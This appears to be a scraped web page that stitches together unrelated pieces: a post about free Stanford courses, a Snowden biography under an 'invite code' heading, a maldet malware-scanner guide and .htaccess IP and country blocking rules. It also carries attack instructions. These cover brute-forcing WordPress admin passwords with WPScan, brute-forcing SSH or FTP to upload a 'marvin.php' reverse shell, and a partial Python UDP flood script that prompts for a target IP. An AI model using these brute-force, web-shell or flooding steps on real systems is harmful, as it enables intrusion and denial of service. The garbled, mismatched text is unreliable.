Just a little tip.
I’ve been trying out these courses that are offered by Stanford. Yes, Stanford University just down the road from Palo Alto. That one!
Stanford University offers 60 day free course in many fields. They have great content and you even get exclusive access to some lecturers if you’re lucky.
The courses mostly cover introduction level areas of the field you’re interested in. I decided to give it a go because hey, why not and i dont regret it. Nothing bad came from the experience.
I got access to a bunch of recordings, test labs and reading resources. Its actually not much difference to other online academies like Udemy.
For Anyone interested, I gave this course a go:
Step 1: Extracting an invite code
Edward Joseph Snowden (born June 21, 1983) is an American whistleblower who copied and leaked highly classified information from the National Security Agency (NSA) in 2013 when he was a Central Intelligence Agency (CIA) employee and subcontractor. His disclosures revealed numerous global surveillance programs, many run by the NSA and the Five Eyes Intelligence Alliance with the cooperation of telecommunication companies and European governments, and prompted a cultural discussion about national security and individual privacy.
In 2013, Snowden was hired by an NSA contractor, Booz Allen Hamilton, after previous employment with Dell and the CIA. Snowden says he gradually became disillusioned with the programs with which he was involved and that he tried to raise his ethical concerns through internal channels but was ignored. On May 20, 2013, Snowden flew to Hong Kong after leaving his job at an NSA facility in Hawaii, and in early June he revealed thousands of classified NSA documents to journalists Glenn Greenwald, Laura Poitras, and Ewen MacAskill. Snowden came to international attention after stories based on the material appeared in The Guardian and The Washington Post. Further disclosures were made by other publications including Der Spiegel and The New York Times.
On Snowden’s 30th birthday, June 21, 2013, the U.S. Department of Justice unsealed charges against Snowden of two counts of violating the Espionage Act of 1917 and theft of government property, following which the Department of State revoked his passport. Two days later, he flew into Moscow’s Sheremetyevo Airport, where Russian authorities noted that his U.S. passport had been cancelled, and he was restricted to the airport terminal for over one month. Russia later granted Snowden the right of asylum with an initial visa for residence for one year, and repeated extensions have permitted him to stay at least until 2020. In early 2016, he became the president of the Freedom of the Press Foundation, a San Francisco-based organization that states its purpose is to protect journalists from hacking and government surveillance.As of 2017 he is married and living in Moscow.
On September 17, 2019, his memoir Permanent Record was published. On the first day of publication, the U.S. Department of Justice filed a civil lawsuit against Snowden over publication of his memoir, alleging he had breached nondisclosure agreements signed with the U.S. federal government. Former The Guardian national security reporter Ewen MacAskill called the civil lawsuit a “huge mistake”, noting that the “UK ban of Spycatcher 30 years ago created huge demand”.The memoir was listed as no. 1 on Amazon’s bestseller list that same day.In an interview with Amy Goodman on Democracy Now! On 26 September 2019, Snowden clarified he considers himself a “whistleblower” as opposed to a “leaker” as he considers “a leaker only distributes information for personal gain”.
How to gain access to WordPress using WP Scan
- Use WP Scan to Identify Administrator users
- Use a word list to bruteforce possible password combinations to Administrator user
Linux Malware Detect (Maldet) is a malware scanner for server under the GNU GPLv2 license. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. Using maldet in Linux server malware tool, it can simply find-out the infected files from the Linux file system and we can remove the file to a different location.
1) SSH to the server
2) Download the tar file
3) Extract the file.
tar -xzf maldetect-current.tar.gz
4) Go to the maldet folder
5) To install maldet, run the below command
Now the installation is completed.
How to use maldet in a server
To can scan file or folder.
maldet -a /path/to/scan
OR maldet –scan-all /path/to/scan
View the scan report.
maldet -e SCAN ID OR maldet –report SCAN ID
Quarantine all malware results from a previous scan
maldet -q SCAN ID OR maldet –quarantine SCAN ID
Clean on all malware results from a previous scan
maldet –clean SCANID
If you’re getting too much unwanted traffic from certain IP’s, a handy tool is the IP blocking feature of .htaccess file (click here for a tutorial on seeing which IP’s hit your site). This file is located in the public_html folder of your primary domain, and the primary folder of any subdomains and add on domains. Just add the following code to the top of your file:
deny deny from 220.127.116.11
deny from 18.104.22.168
allow from all
You can also do the reverse, and allow only specific IP’s to be allowed on your site:
deny from all
allow from 22.214.171.124
What if the unwanted visitor is from a different country and keeps changing their IP? Provided your website isn’t intended for visitors from that country, you can easily use the GeoIP tool to block that country. Just add the below code to the top of your .htaccess file.
# Add countries you wish to deny here
SetEnvIf GEOIP_COUNTRY_CODE CO DenyCountry
SetEnvIf GEOIP_COUNTRY_CODE EG DenyCountry
SetEnvIf GEOIP_COUNTRY_CODE HI DenyCountry
Allow from all
Deny from env=DenyCountry
You can also do the opposite and only allow specific countries to access your website. This is a great proactive security measure if, for example, you only intend to have Australian clients or visitors to your site.
# Put countries to allow here
SetEnvIf GEOIP_COUNTRY_CODE AU AllowCountry
SetEnvIf GEOIP_COUNTRY_CODE NZ AllowCountry
Deny from all
Allow from env=AllowCountry
A list of all country codes can be found bellow or at their original source here: http://dev.maxmind.com/geoip/legacy/codes/iso3166/
A story about how NASA was compromised by two Aussie kids from the suburbs.
You will need to bruteforce SSH or FTP. Preferably SSH for high level access. Create the reverse shell marvin.php and upload the following code.
Once you have uploaded the file go to the path where you uploaded marvin.php and you will now have outside access from a web browser.
This attack sends multiple packets to a target IP address on a specified port for a specified period of time.
Create the file flood.py and insert the following content
# Opens a new socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Creates a packet
bytes = random._urandom(7000)
# Prompts user to input target IP
ip = input(‘Target IP: ‘)
# Prompts user to input target port
port = int(input(‘Port: ‘))
# Prompts user to input number of seconds to delay packets
duration = int(input(“Number of seconds to send packets:”))
timeout = time.time() + duration
sent = 0
if time.time() > timeout:
sent = sent + 1
print(sent, ip, port)
Then run the following command: